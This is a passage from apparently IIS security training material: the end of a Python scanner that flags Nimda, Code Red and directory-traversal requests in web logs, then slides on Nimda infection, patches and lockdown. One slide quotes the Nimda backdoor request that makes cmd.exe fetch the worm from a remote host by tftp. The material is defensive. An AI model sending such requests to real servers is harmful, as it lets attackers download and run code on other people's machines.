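    basename = stem.replace("\\", "/").rsplit("/", 1)[-1].lower()
    tags = []
    if basename in SHELLS:
        tags.append("shell")                 # cmd.exe or the root.exe backdoor
    if escapes_root(stem):
        tags.append("traversal")             # '..' climbs out of the web root
    if MALFORMED_DOTDOT.search(stem):
        tags.append("malformed-traversal")   # Unicode/overlong '..' variants
    if "tftp" in query.lower():
        tags.append("tftp-fetch")            # Nimda pulling Admin.dll
    if basename.endswith((".ida", ".idq")) and ("%u" in query or len(query) > 200):
        tags.append("ida-overflow")          # Code Red style payload
    return tags


def scan(text):
    """Return the flagged records: client IP, time, raw stem and tags."""
    hits = []
    for rec in parse_w3c(text):
        tags = classify(rec)
        if tags:
            hits.append({"c-ip": rec["c-ip"], "time": rec["time"],
                         "stem": rec["cs-uri-stem"], "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["c-ip"], ",".join(hit["tags"]), hit["stem"])
```

Reading the field names from #Fields rather than hard-coding column positions is what keeps the parser working when someone changes the extended logging properties; the %c1%1c line is flagged as malformed-traversal rather than traversal because Python's strict decoder does not turn the invalid byte into a slash the way unpatched IIS did.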

72
Nimda on IIS Server
  • Nimda attempts to install an Admin.dll file in the root directory of
    C:\, D:\ or E:\ (note that a file named Admin.dll may be
    legitimately installed by IIS in other directories).
  • It then scans other systems on port 80, attempting to infect them
    with Nimda

73
Nimda Backdoor
  • Attackers send the string
    /c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll (as the
    cmd.exe query) to attempt to connect to infected systems and pull
    the worm down with tftp.
  • A return code of 200 indicates success of this command.

74
Ways to Protect Against Nimda (Email Portion)
  • Microsoft Patch for automatic execution of
    previewed files in Outlook (MS01-020)
  • Do not open attachments without verification
  • Protect against open network shares

75
Ways to Protect Against Nimda (IIS Portion)
  • Microsoft cumulative patch MS02-062 (protects against both means of
    Nimda IIS infection: the Code Red II backdoor and directory
    traversal; remove any root.exe already on disk as well)
  • If not using Indexing Services, remove the application mapping for
    .ida and .idq
  • Install URLScan and deny any request containing "%" in the URL
  • Restrict access to cmd.exe so that it can't be used by the worm
  • Protect against the "Relative Shell Path" vulnerability of
    explorer.exe: Microsoft patch MS00-052
  • Disable Parent Paths

77
In Conclusion
  • IIS is a big target for skilled hackers as well as script kiddies.
  • Staying current on patches will help prevent your IIS box from being
    broken into; however, proper lockdown will also be highly effective
    against future vulnerabilities.

78
Microsoft Security Guides
  • Microsoft Guide to Securing IIS 5
  • http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/iis/tips/iis5chk.asp
  • Microsoft Guide to Securing Windows 2000
  • http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/prodtech/windows/secwin2k/default.asp

79
Slides and Recommended Guidelines
  • Today's slides, recommended guidelines for IIS, Windows 2000 and XP,
    links to security tools and further reading
  • http://www.personal.psu.edu/lxm30/windows/windows.html
